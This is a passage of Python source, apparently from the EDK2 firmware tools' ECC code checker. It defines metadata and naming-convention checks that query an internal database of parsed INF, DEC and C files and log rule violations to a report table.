EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_PCD_NO_USE, Record[1] + '.' + Record[2]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_NO_USE, OtherMsg=\"The PCD [%s] defined in INF file is not specified in either DSC or FDF files\" % (Record[1] + '.' + Record[2]), BelongsToTable='Inf', BelongsToItem=Record[0])\r\n\r\n # Check whether having duplicate guids defined for Guid/Protocol/Ppi\r\n def MetaDataFileCheckGuidDuplicate(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckGuidDuplicate == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for duplicate GUID/PPI/PROTOCOL ...\")\r\n # Check Guid\r\n self.CheckGuidProtocolPpi(ERROR_META_DATA_FILE_CHECK_DUPLICATE_GUID, MODEL_EFI_GUID, EccGlobalData.gDb.TblDec)\r\n self.CheckGuidProtocolPpi(ERROR_META_DATA_FILE_CHECK_DUPLICATE_GUID, MODEL_EFI_GUID, EccGlobalData.gDb.TblDsc)\r\n self.CheckGuidProtocolPpiValue(ERROR_META_DATA_FILE_CHECK_DUPLICATE_GUID, MODEL_EFI_GUID)\r\n # Check protocol\r\n self.CheckGuidProtocolPpi(ERROR_META_DATA_FILE_CHECK_DUPLICATE_PROTOCOL, MODEL_EFI_PROTOCOL, EccGlobalData.gDb.TblDec)\r\n self.CheckGuidProtocolPpi(ERROR_META_DATA_FILE_CHECK_DUPLICATE_PROTOCOL, MODEL_EFI_PROTOCOL, EccGlobalData.gDb.TblDsc)\r\n self.CheckGuidProtocolPpiValue(ERROR_META_DATA_FILE_CHECK_DUPLICATE_PROTOCOL, MODEL_EFI_PROTOCOL)\r\n # Check ppi\r\n self.CheckGuidProtocolPpi(ERROR_META_DATA_FILE_CHECK_DUPLICATE_PPI, MODEL_EFI_PPI, EccGlobalData.gDb.TblDec)\r\n self.CheckGuidProtocolPpi(ERROR_META_DATA_FILE_CHECK_DUPLICATE_PPI, MODEL_EFI_PPI, EccGlobalData.gDb.TblDsc)\r\n self.CheckGuidProtocolPpiValue(ERROR_META_DATA_FILE_CHECK_DUPLICATE_PPI, MODEL_EFI_PPI)\r\n\r\n # Check whether all files under module directory are described in INF files\r\n def MetaDataFileCheckModuleFileNoUse(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckModuleFileNoUse == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for no used module files ...\")\r\n SqlCommand = \"\"\"\r\n select upper(Path) from File where ID in (select BelongsToFile from Inf where BelongsToFile != -1)\r\n \"\"\"\r\n InfPathSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n InfPathList = []\r\n for Item in InfPathSet:\r\n if Item[0] not in InfPathList:\r\n InfPathList.append(Item[0])\r\n SqlCommand = \"\"\"\r\n select ID, Path, FullPath from File where 
upper(FullPath) not in\r\n (select upper(A.Path) || '%s' || upper(B.Value1) from File as A, INF as B\r\n where A.ID in (select BelongsToFile from INF where Model = %s group by BelongsToFile) and\r\n B.BelongsToFile = A.ID and B.Model = %s)\r\n and (Model = %s or Model = %s)\r\n \"\"\" % (os.sep, MODEL_EFI_SOURCE_FILE, MODEL_EFI_SOURCE_FILE, MODEL_FILE_C, MODEL_FILE_H)\r\n RecordSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Path = Record[1]\r\n Path = Path.upper().replace('\\X64', '').replace('\\IA32', '').replace('\\EBC', '').replace('\\IPF', '').replace('\\ARM', '')\r\n if Path in InfPathList:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_MODULE_FILE_NO_USE, Record[2]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_MODULE_FILE_NO_USE, OtherMsg=\"The source file [%s] is existing in module directory but it is not described in INF file.\" % (Record[2]), BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # Check whether the PCD is correctly used in C function via its type\r\n def MetaDataFileCheckPcdType(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckPcdType == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for pcd type in c code function usage ...\")\r\n SqlCommand = \"\"\"\r\n select ID, Model, Value1, Value2, BelongsToFile from INF where Model > %s and Model < %s\r\n \"\"\" % (MODEL_PCD, MODEL_META_DATA_HEADER)\r\n PcdSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n for Pcd in PcdSet:\r\n Model = Pcd[1]\r\n PcdName = Pcd[2]\r\n if Pcd[3]:\r\n PcdName = Pcd[3]\r\n BelongsToFile = Pcd[4]\r\n SqlCommand = \"\"\"\r\n select ID from File where FullPath in\r\n (select B.Path || '%s' || A.Value1 from INF as A, File as B where A.Model = %s and A.BelongsToFile = %s\r\n and B.ID = %s and (B.Model = %s or B.Model = %s))\r\n \"\"\" % (os.sep, MODEL_EFI_SOURCE_FILE, BelongsToFile, BelongsToFile, MODEL_FILE_C, MODEL_FILE_H)\r\n TableSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Tbl in TableSet:\r\n TblName = 'Identifier' + str(Tbl[0])\r\n SqlCommand = \"\"\"\r\n select Name, ID from %s where value like '%s' and Model = %s\r\n \"\"\" % (TblName, PcdName, MODEL_IDENTIFIER_FUNCTION_CALLING)\r\n RecordSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n TblNumber = TblName.replace('Identifier', '')\r\n for Record in RecordSet:\r\n FunName = Record[0]\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_PCD_TYPE, FunName):\r\n if Model in [MODEL_PCD_FIXED_AT_BUILD] and not FunName.startswith('FixedPcdGet'):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_TYPE, OtherMsg=\"The pcd '%s' is defined as a FixPcd but now it is called by c function [%s]\" % (PcdName, FunName), BelongsToTable=TblName, BelongsToItem=Record[1])\r\n if Model in [MODEL_PCD_FEATURE_FLAG] and (not FunName.startswith('FeaturePcdGet') and not FunName.startswith('FeaturePcdSet')):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_TYPE, OtherMsg=\"The pcd '%s' is defined as a FeaturePcd but now it is called by c function [%s]\" % (PcdName, FunName), BelongsToTable=TblName, BelongsToItem=Record[1])\r\n if Model in [MODEL_PCD_PATCHABLE_IN_MODULE] and (not FunName.startswith('PatchablePcdGet') and not FunName.startswith('PatchablePcdSet')):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_TYPE, OtherMsg=\"The pcd '%s' is defined as a PatchablePcd but now it is called by c 
function [%s]\" % (PcdName, FunName), BelongsToTable=TblName, BelongsToItem=Record[1])\r\n\r\n #ERROR_META_DATA_FILE_CHECK_PCD_TYPE\r\n pass\r\n\r\n # Internal worker function to get the INF workspace relative path from FileID\r\n def GetInfFilePathFromID(self, FileID):\r\n Table = EccGlobalData.gDb.TblFile\r\n SqlCommand = \"\"\"select A.FullPath from %s as A where A.ID = %s\"\"\" % (Table.Table, FileID)\r\n RecordSet = Table.Exec(SqlCommand)\r\n Path = \"\"\r\n for Record in RecordSet:\r\n Path = mws.relpath(Record[0], EccGlobalData.gWorkspace)\r\n return Path\r\n\r\n # Check whether two module INFs under one workspace has the same FILE_GUID value\r\n def MetaDataFileCheckModuleFileGuidDuplication(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckModuleFileGuidDuplication == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for pcd type in c code function usage ...\")\r\n Table = EccGlobalData.gDb.TblInf\r\n SqlCommand = \"\"\"\r\n select A.ID, A.Value3, A.BelongsToFile, B.BelongsToFile from %s as A, %s as B\r\n where A.Value2 = 'FILE_GUID' and B.Value2 = 'FILE_GUID' and\r\n A.Value3 = B.Value3 and A.ID != B.ID group by A.ID\r\n \"\"\" % (Table.Table, Table.Table)\r\n RecordSet = Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n InfPath1 = self.GetInfFilePathFromID(Record[2])\r\n InfPath2 = self.GetInfFilePathFromID(Record[3])\r\n if InfPath1 and InfPath2:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_MODULE_FILE_GUID_DUPLICATION, InfPath1):\r\n Msg = \"The FILE_GUID of INF file [%s] is duplicated with that of %s\" % (InfPath1, InfPath2)\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_MODULE_FILE_GUID_DUPLICATION, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n\r\n\r\n # Check Guid Format in module INF\r\n def MetaDataFileCheckModuleFileGuidFormat(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckModuleFileGuidFormat == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Check Guid Format in module INF ...\")\r\n Table = EccGlobalData.gDb.TblInf\r\n SqlCommand = \"\"\"\r\n select ID, Value1, Usage, BelongsToFile from %s where Model = %s group by ID\r\n \"\"\" % (Table.Table, MODEL_EFI_GUID)\r\n RecordSet = Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Value1 = Record[1]\r\n Value2 = Record[2]\r\n GuidCommentList = []\r\n InfPath = self.GetInfFilePathFromID(Record[3])\r\n Msg = \"The GUID format of %s in INF file [%s] does not follow rules\" % (Value1, InfPath)\r\n if Value2.startswith(DT.TAB_SPECIAL_COMMENT):\r\n GuidCommentList = Value2[2:].split(DT.TAB_SPECIAL_COMMENT)\r\n if GuidCommentList[0].strip().startswith(DT.TAB_INF_USAGE_UNDEFINED):\r\n continue\r\n elif len(GuidCommentList) > 1:\r\n if not GuidCommentList[0].strip().startswith((DT.TAB_INF_USAGE_PRO,\r\n DT.TAB_INF_USAGE_SOME_PRO,\r\n DT.TAB_INF_USAGE_CON,\r\n DT.TAB_INF_USAGE_SOME_CON)):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_GUID, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n if not (GuidCommentList[1].strip()).startswith(DT.TAB_INF_GUIDTYPE_VAR) and \\\r\n not GuidCommentList[1].strip().startswith((DT.TAB_INF_GUIDTYPE_EVENT,\r\n DT.TAB_INF_GUIDTYPE_HII,\r\n DT.TAB_INF_GUIDTYPE_FILE,\r\n DT.TAB_INF_GUIDTYPE_HOB,\r\n DT.TAB_INF_GUIDTYPE_FV,\r\n DT.TAB_INF_GUIDTYPE_ST,\r\n DT.TAB_INF_GUIDTYPE_TSG,\r\n DT.TAB_INF_GUIDTYPE_GUID,\r\n 
DT.TAB_INF_GUIDTYPE_PROTOCOL,\r\n DT.TAB_INF_GUIDTYPE_PPI,\r\n DT.TAB_INF_USAGE_UNDEFINED)):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_GUID, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n else:\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_GUID, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n else:\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_GUID, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n\r\n # Check Protocol Format in module INF\r\n def MetaDataFileCheckModuleFileProtocolFormat(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckModuleFileProtocolFormat == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Check Protocol Format in module INF ...\")\r\n Table = EccGlobalData.gDb.TblInf\r\n SqlCommand = \"\"\"\r\n select ID, Value1, Usage, BelongsToFile from %s where Model = %s group by ID\r\n \"\"\" % (Table.Table, MODEL_EFI_PROTOCOL)\r\n RecordSet = Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Value1 = Record[1]\r\n Value2 = Record[2]\r\n GuidCommentList = []\r\n InfPath = self.GetInfFilePathFromID(Record[3])\r\n Msg = \"The Protocol format of %s in INF file [%s] does not follow rules\" % (Value1, InfPath)\r\n if Value2.startswith(DT.TAB_SPECIAL_COMMENT):\r\n GuidCommentList = Value2[2:].split(DT.TAB_SPECIAL_COMMENT)\r\n if len(GuidCommentList) >= 1:\r\n if not GuidCommentList[0].strip().startswith((DT.TAB_INF_USAGE_PRO,\r\n DT.TAB_INF_USAGE_SOME_PRO,\r\n DT.TAB_INF_USAGE_CON,\r\n DT.TAB_INF_USAGE_SOME_CON,\r\n DT.TAB_INF_USAGE_NOTIFY,\r\n DT.TAB_INF_USAGE_TO_START,\r\n DT.TAB_INF_USAGE_BY_START,\r\n DT.TAB_INF_USAGE_UNDEFINED)):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PROTOCOL, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n else:\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PROTOCOL, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n\r\n\r\n # Check Ppi Format in module INF\r\n def MetaDataFileCheckModuleFilePpiFormat(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckModuleFilePpiFormat == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Check Ppi Format in module INF ...\")\r\n Table = EccGlobalData.gDb.TblInf\r\n SqlCommand = \"\"\"\r\n select ID, Value1, Usage, BelongsToFile from %s where Model = %s group by ID\r\n \"\"\" % (Table.Table, MODEL_EFI_PPI)\r\n RecordSet = Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Value1 = Record[1]\r\n Value2 = Record[2]\r\n GuidCommentList = []\r\n InfPath = self.GetInfFilePathFromID(Record[3])\r\n Msg = \"The Ppi format of %s in INF file [%s] does not follow rules\" % (Value1, InfPath)\r\n if Value2.startswith(DT.TAB_SPECIAL_COMMENT):\r\n GuidCommentList = Value2[2:].split(DT.TAB_SPECIAL_COMMENT)\r\n if len(GuidCommentList) >= 1:\r\n if not GuidCommentList[0].strip().startswith((DT.TAB_INF_USAGE_PRO,\r\n DT.TAB_INF_USAGE_SOME_PRO,\r\n DT.TAB_INF_USAGE_CON,\r\n DT.TAB_INF_USAGE_SOME_CON,\r\n DT.TAB_INF_USAGE_NOTIFY,\r\n DT.TAB_INF_USAGE_UNDEFINED)):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PPI, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n else:\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PPI, OtherMsg=Msg, BelongsToTable=Table.Table, 
BelongsToItem=Record[0])\r\n\r\n # Check Pcd Format in module INF\r\n def MetaDataFileCheckModuleFilePcdFormat(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckModuleFilePcdFormat == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Check Pcd Format in module INF ...\")\r\n Table = EccGlobalData.gDb.TblInf\r\n SqlCommand = \"\"\"\r\n select ID, Model, Value1, Value2, Usage, BelongsToFile from %s where Model >= %s and Model < %s group by ID\r\n \"\"\" % (Table.Table, MODEL_PCD, MODEL_META_DATA_HEADER)\r\n RecordSet = Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Model = Record[1]\r\n PcdName = Record[2] + '.' + Record[3]\r\n Usage = Record[4]\r\n PcdCommentList = []\r\n InfPath = self.GetInfFilePathFromID(Record[5])\r\n Msg = \"The Pcd format of %s in INF file [%s] does not follow rules\" % (PcdName, InfPath)\r\n if Usage.startswith(DT.TAB_SPECIAL_COMMENT):\r\n PcdCommentList = Usage[2:].split(DT.TAB_SPECIAL_COMMENT)\r\n if len(PcdCommentList) >= 1:\r\n if Model in [MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_FEATURE_FLAG] \\\r\n and not PcdCommentList[0].strip().startswith((DT.TAB_INF_USAGE_SOME_PRO,\r\n DT.TAB_INF_USAGE_CON,\r\n DT.TAB_INF_USAGE_UNDEFINED)):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PCD, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n if Model in [MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_DYNAMIC, MODEL_PCD_DYNAMIC_EX] \\\r\n and not PcdCommentList[0].strip().startswith((DT.TAB_INF_USAGE_PRO,\r\n DT.TAB_INF_USAGE_SOME_PRO,\r\n DT.TAB_INF_USAGE_CON,\r\n DT.TAB_INF_USAGE_SOME_CON,\r\n DT.TAB_INF_USAGE_UNDEFINED)):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PCD, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n else:\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PCD, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n\r\n # Check whether these is duplicate Guid/Ppi/Protocol name\r\n def CheckGuidProtocolPpi(self, ErrorID, Model, Table):\r\n Name = ''\r\n if Model == MODEL_EFI_GUID:\r\n Name = 'guid'\r\n if Model == MODEL_EFI_PROTOCOL:\r\n Name = 'protocol'\r\n if Model == MODEL_EFI_PPI:\r\n Name = 'ppi'\r\n SqlCommand = \"\"\"\r\n select A.ID, A.Value1 from %s as A, %s as B\r\n where A.Model = %s and B.Model = %s\r\n and A.Value1 like B.Value1 and A.ID != B.ID\r\n and A.Scope1 = B.Scope1\r\n and A.Enabled > -1\r\n and B.Enabled > -1\r\n group by A.ID\r\n \"\"\" % (Table.Table, Table.Table, Model, Model)\r\n RecordSet = Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not EccGlobalData.gException.IsException(ErrorID, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ErrorID, OtherMsg=\"The %s name [%s] is defined more than one time\" % (Name.upper(), Record[1]), BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n\r\n # Check whether these is duplicate Guid/Ppi/Protocol value\r\n def CheckGuidProtocolPpiValue(self, ErrorID, Model):\r\n Name = ''\r\n Table = EccGlobalData.gDb.TblDec\r\n if Model == MODEL_EFI_GUID:\r\n Name = 'guid'\r\n if Model == MODEL_EFI_PROTOCOL:\r\n Name = 'protocol'\r\n if Model == MODEL_EFI_PPI:\r\n Name = 'ppi'\r\n SqlCommand = \"\"\"\r\n select A.ID, A.Value1, A.Value2 from %s as A, %s as B\r\n where A.Model = %s and B.Model = %s\r\n and A.Value2 like B.Value2 and A.ID != B.ID\r\n and A.Scope1 = B.Scope1 and A.Value1 != B.Value1\r\n group by A.ID\r\n \"\"\" % (Table.Table, Table.Table, Model, Model)\r\n RecordSet 
= Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not EccGlobalData.gException.IsException(ErrorID, Record[2]):\r\n EccGlobalData.gDb.TblReport.Insert(ErrorID, OtherMsg=\"The %s value [%s] is used more than one time\" % (Name.upper(), Record[2]), BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n\r\n # Naming Convention Check\r\n def NamingConventionCheck(self):\r\n if EccGlobalData.gConfig.NamingConventionCheckDefineStatement == '1' \\\r\n or EccGlobalData.gConfig.NamingConventionCheckTypedefStatement == '1' \\\r\n or EccGlobalData.gConfig.NamingConventionCheckIfndefStatement == '1' \\\r\n or EccGlobalData.gConfig.NamingConventionCheckVariableName == '1' \\\r\n or EccGlobalData.gConfig.NamingConventionCheckSingleCharacterVariable == '1' \\\r\n or EccGlobalData.gConfig.NamingConventionCheckAll == '1'\\\r\n or EccGlobalData.gConfig.CheckAll == '1':\r\n for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n for F in Filenames:\r\n if os.path.splitext(F)[1] in ('.h', '.c'):\r\n FullName = os.path.join(Dirpath, F)\r\n Id = c.GetTableID(FullName)\r\n if Id < 0:\r\n continue\r\n FileTable = 'Identifier' + str(Id)\r\n self.NamingConventionCheckDefineStatement(FileTable)\r\n self.NamingConventionCheckTypedefStatement(FileTable)\r\n self.NamingConventionCheckVariableName(FileTable)\r\n self.NamingConventionCheckSingleCharacterVariable(FileTable)\r\n if os.path.splitext(F)[1] in ('.h'):\r\n self.NamingConventionCheckIfndefStatement(FileTable)\r\n\r\n self.NamingConventionCheckPathName()\r\n self.NamingConventionCheckFunctionName()\r\n\r\n # Check whether only capital letters are used for #define declarations\r\n def NamingConventionCheckDefineStatement(self, FileTable):\r\n if EccGlobalData.gConfig.NamingConventionCheckDefineStatement == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of #define statement ...\")\r\n\r\n SqlCommand = \"\"\"select ID, Value from %s where Model = %s\"\"\" % (FileTable, MODEL_IDENTIFIER_MACRO_DEFINE)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Name = Record[1].strip().split()[1]\r\n if Name.find('(') != -1:\r\n Name = Name[0:Name.find('(')]\r\n if Name.upper() != Name:\r\n if not EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_DEFINE_STATEMENT, Name):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_DEFINE_STATEMENT, OtherMsg=\"The #define name [%s] does not follow the rules\" % (Name), BelongsToTable=FileTable, BelongsToItem=Record[0])\r\n\r\n # Check whether only capital letters are used for typedef declarations\r\n def NamingConventionCheckTypedefStatement(self, FileTable):\r\n if EccGlobalData.gConfig.NamingConventionCheckTypedefStatement == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of #typedef statement ...\")\r\n\r\n SqlCommand = \"\"\"select ID, Name from %s where Model = %s\"\"\" % (FileTable, MODEL_IDENTIFIER_TYPEDEF)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Name = Record[1].strip()\r\n if Name != '' and Name is not None:\r\n if Name[0] == '(':\r\n Name = Name[1:Name.find(')')]\r\n if Name.find('(') > -1:\r\n Name = Name[Name.find('(') + 1 : Name.find(')')]\r\n Name = Name.replace('WINAPI', '')\r\n Name = Name.replace('*', '').strip()\r\n if Name.upper() != Name:\r\n if not 
EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_TYPEDEF_STATEMENT, Name):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_TYPEDEF_STATEMENT, OtherMsg=\"The #typedef name [%s] does not follow the rules\" % (Name), BelongsToTable=FileTable, BelongsToItem=Record[0])\r\n\r\n # Check whether the #ifndef at the start of an include file uses both prefix and postfix underscore characters, '_'.\r\n def NamingConventionCheckIfndefStatement(self, FileTable):\r\n if EccGlobalData.gConfig.NamingConventionCheckIfndefStatement == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of #ifndef statement ...\")\r\n\r\n SqlCommand = \"\"\"select ID, Value from %s where Model = %s\"\"\" % (FileTable, MODEL_IDENTIFIER_MACRO_IFNDEF)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n if RecordSet:\r\n # Only check the first ifndef statement of the file\r\n FirstDefine = sorted(RecordSet, key=lambda Record: Record[0])[0]\r\n Name = FirstDefine[1].replace('#ifndef', '').strip()\r\n if Name[0] == '_' or Name[-1] != '_' or Name[-2] == '_':\r\n if not EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_IFNDEF_STATEMENT, Name):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_IFNDEF_STATEMENT, OtherMsg=\"The #ifndef name [%s] does not follow the rules\" % (Name), BelongsToTable=FileTable, BelongsToItem=FirstDefine[0])\r\n\r\n # Rule for path name, variable name and function name\r\n # 1. First character should be upper case\r\n # 2. Existing lower case in a word\r\n # 3. No space existence\r\n # Check whether the path name followed the rule\r\n def NamingConventionCheckPathName(self):\r\n if EccGlobalData.gConfig.NamingConventionCheckPathName == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of file path name ...\")\r\n Pattern = re.compile(r'^[A-Z]+\\S*[a-z]\\S*$')\r\n SqlCommand = \"\"\"select ID, Name from File\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not Pattern.match(Record[1]):\r\n if not EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_PATH_NAME, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_PATH_NAME, OtherMsg=\"The file path [%s] does not follow the rules\" % (Record[1]), BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # Rule for path name, variable name and function name\r\n # 1. First character should be upper case\r\n # 2. Existing lower case in a word\r\n # 3. No space existence\r\n # 4. 
Global variable name must start with a 'g'\r\n # Check whether the variable name followed the rule\r\n def NamingConventionCheckVariableName(self, FileTable):\r\n if EccGlobalData.gConfig.NamingConventionCheckVariableName == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of variable name ...\")\r\n Pattern = re.compile(r'^[A-Zgm]+\\S*[a-z]\\S*$')\r\n\r\n SqlCommand = \"\"\"select ID, Name, Modifier from %s where Model = %s\"\"\" % (FileTable, MODEL_IDENTIFIER_VARIABLE)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Var = Record[1]\r\n Modifier = Record[2]\r\n if Var.startswith('CONST'):\r\n Var = Var[5:].lstrip()\r\n if not Pattern.match(Var) and not (Modifier.endswith('*') and Var.startswith('p')):\r\n if not EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_VARIABLE_NAME, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_VARIABLE_NAME, OtherMsg=\"The variable name [%s] does not follow the rules\" % (Record[1]), BelongsToTable=FileTable, BelongsToItem=Record[0])\r\n\r\n # Rule for path name, variable name and function name\r\n # 1. First character should be upper case\r\n # 2. Existing lower case in a word\r\n # 3. No space existence\r\n # Check whether the function name followed the rule\r\n def NamingConventionCheckFunctionName(self):\r\n if EccGlobalData.gConfig.NamingConventionCheckFunctionName == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of function name ...\")\r\n Pattern = re.compile(r'^[A-Z]+\\S*[a-z]\\S*$')\r\n SqlCommand = \"\"\"select ID, Name from Function\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not Pattern.match(Record[1]):\r\n if not EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_FUNCTION_NAME, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_FUNCTION_NAME, OtherMsg=\"The function name [%s] does not follow the rules\" % (Record[1]), BelongsToTable='Function', BelongsToItem=Record[0])\r\n\r\n # Check whether NO use short variable name with single character\r\n def NamingConventionCheckSingleCharacterVariable(self, FileTable):\r\n if EccGlobalData.gConfig.NamingConventionCheckSingleCharacterVariable == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of single character variable name ...\")\r\n\r\n SqlCommand = \"\"\"select ID, Name from %s where Model = %s\"\"\" % (FileTable, MODEL_IDENTIFIER_VARIABLE)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Variable = Record[1].replace('*', '')\r\n if len(Variable) == 1:\r\n if not EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_SINGLE_CHARACTER_VARIABLE, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_SINGLE_CHARACTER_VARIABLE, OtherMsg=\"The variable name [%s] does not follow the rules\" % (Record[1]), 